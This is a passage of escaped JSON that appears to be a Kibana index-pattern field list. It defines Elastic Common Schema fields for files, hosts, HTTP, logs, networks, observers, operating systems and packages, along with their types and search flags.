gatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\